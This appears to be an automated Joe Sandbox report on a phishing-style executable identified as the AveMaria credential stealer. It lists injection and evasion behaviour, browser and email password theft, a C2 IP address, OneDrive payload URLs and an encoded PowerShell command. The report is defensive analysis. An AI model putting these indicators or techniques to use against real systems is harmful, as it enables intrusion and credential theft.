Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041EE7B FindFirstFileW,FindNextFileW,		3_2_0041EE7B
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004147CA GetFullPathNameA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,		3_2_004147CA

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0040AC93 getaddrinfo,socket,htons,freeaddrinfo,LoadLibraryA,GetProcAddress,WSAConnect,

3_2_0040AC93

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041F8F0 mov eax, dword ptr fs:[00000030h]	3_2_0041F8F0
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041F902 mov eax, dword ptr fs:[00000030h]	3_2_0041F902
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0042C78A mov eax, dword ptr fs:[00000030h]	3_2_0042C78A

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0040B853 GetProcessHeap,RtlFreeHeap,

3_2_0040B853

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: Base64 decoded start-sleep -seconds 20			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Memory written: C:\Users\user\Desktop\order_of_quotationpdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00422385 OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		3_2_00422385
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004115FB OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,		3_2_004115FB

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==			Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Users\user\Desktop\order_of_quotationpdf.exe C:\Users\user\Desktop\order_of_quotationpdf.exe			Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041DF7D AllocateAndInitializeSid,GetLastError,LookupAccountSidW,GetLastError,FreeSid,

3_2_0041DF7D

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0042170C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

3_2_0042170C

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Queries volume information: C:\Users\user\Desktop\order_of_quotationpdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041E533 cpuid

3_2_0041E533

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_00413C30 GetModuleHandleA,SHGetFolderPathW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,TranslateMessage,DispatchMessageA,

3_2_00413C30

Lowering of HIPS / PFW / Operating System Security Settings

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.728de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

Contains functionality to steal e-mail passwords

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: POP3 Password	3_2_004152D3
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: SMTP Password	3_2_004152D3
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: IMAP Password	3_2_004152D3

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: \Google\Chrome\User Data\Default\Login Data		3_2_00417C54
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: \Chromium\User Data\Default\Login Data		3_2_00417C54

Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.728de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	1 Create Account	1 Access Token Manipulation	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	21 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Endpoint Denial of Service
Domain Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	211 Process Injection	2 Obfuscated Files or Information	1 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	11 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	3 Masquerading	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	11 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	11 Security Software Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	21 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	2 Process Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Users	Network Sniffing	1 Application Window Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe	5%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.order_of_quotationpdf.exe.7350000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
3.2.order_of_quotationpdf.exe.400000.2.unpack	100%	Avira	TR/Redcap.ghjpt		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://urn.to/r/sds_see	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://hv4wug.ch.files.1drv.com4	0%	Avira URL Cloud	safe
193.47.61.26	2%	Virustotal		Browse
193.47.61.26	0%	Avira URL Cloud	safe
https://onedrive.live.com4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onedrive.live.com	unknown	unknown	false		high
hv4wug.ch.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
193.47.61.26	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=BD9480D014FE52E5&resid=BD9480D014FE52E5%21452&authkey=AD76Y_n	order_of_quotationpdf.exe, Fjugfe.exe.0.dr	false		high
https://github.com/syohex/java-simple-mine-sweeper-instInitWindows	order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, order_of_quotationpdf.exe, 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://onedrive.live.com4	order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/json	order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.nuget.org/packages/Newtonsoft.Json.Bson	order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://urn.to/r/sds_see	order_of_quotationpdf.exe, 00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hv4wug.ch.files.1drv.com/y4mbABMM8eBFlIJQ9RL9WIUqCc9LaoCtOIlyUPUTZjkk_TLd0ia6dyBAjlAESc4qF_U	order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?cid=BD9480D014FE52E5&resid=BD9480D014FE52E5	order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hv4wug.ch.files.1drv.com4	order_of_quotationpdf.exe, 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/syohex/java-simple-mine-sweeper	order_of_quotationpdf.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.47.61.26	unknown	Germany		4842	TH-AS-APTianhaiInfoTechCN	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	840855
Start date and time:	2023-04-04 12:51:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	order_of_quotationpdf.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winEXE@6/7@4/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.7% (good quality ratio 97.5%) Quality average: 80.5% Quality standard deviation: 19.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 134 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, ctldl.windowsupdate.com, odc-ch-files-geo.onedrive.akadns.net, odc-ch-files-brs.onedrive.akadns.net, ch-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:52:09	API Interceptor	25x Sleep call for process: order_of_quotationpdf.exe modified
12:52:21	API Interceptor	27x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.47.61.26	Requirements_for_RFQ_0643CQREpdf.exe	Get hash	malicious	AveMaria, UACMe	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TH-AS-APTianhaiInfoTechCN	Requirements_for_RFQ_0643CQREpdf.exe	Get hash	malicious	AveMaria, UACMe	Browse	193.47.61.26
	file.exe	Get hash	malicious	XWorm	Browse	193.47.61.37
	ATT20231.HTM	Get hash	malicious	HTMLPhisher	Browse	193.47.61.212
	UrQrIdRfCg.exe	Get hash	malicious	Unknown	Browse	202.61.192.193
	UrQrIdRfCg.exe	Get hash	malicious	Unknown	Browse	202.61.192.193
